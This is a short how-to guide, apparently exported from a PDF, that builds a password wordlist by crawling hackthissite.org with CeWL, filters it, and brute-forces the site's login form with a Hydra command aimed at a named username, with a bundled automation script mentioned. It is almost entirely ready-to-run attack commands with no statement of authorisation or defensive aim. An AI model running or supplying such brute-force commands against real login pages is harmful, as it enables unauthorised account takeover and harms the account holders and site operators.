Automated Password Testing with CeWL and Hydra
This guide describes how to use CeWL and Hydra to generate a wordlist from a website and brute-force a
login form.
Step 1: Crawl Website with CeWL
-------------------------------
Use CeWL to scrape words from a target site and build a password list:
cewl -d 2 -w cewl_wordlist.txt https://www.hackthissite.org
This creates a wordlist named 'cewl_wordlist.txt' from the website.
Step 2: Clean the Wordlist
--------------------------
To remove short and duplicate words, run:
cat cewl_wordlist.txt | sort | uniq | grep -E '.{8,}' > cleaned_wordlist.txt
Step 3: Brute-Force Login with Hydra
------------------------------------
With a known username, use Hydra like this:
hydra -l stensly -P cleaned_wordlist.txt hackthissite.org http-post-form
"/user/login:username=^USER^&password=^PASS^:F=invalid password"
This command will attempt each password against the login form and stop on success.
Automated Script
----------------
To automate the process, run the bash script included in the provided ZIP file:
./cewl_hydra_auto.sh
Page 1
� Automated Password Testing with CeWL and Hydra
Ensure all tools (cewl, hydra) are installed and accessible in PATH.
Page 2
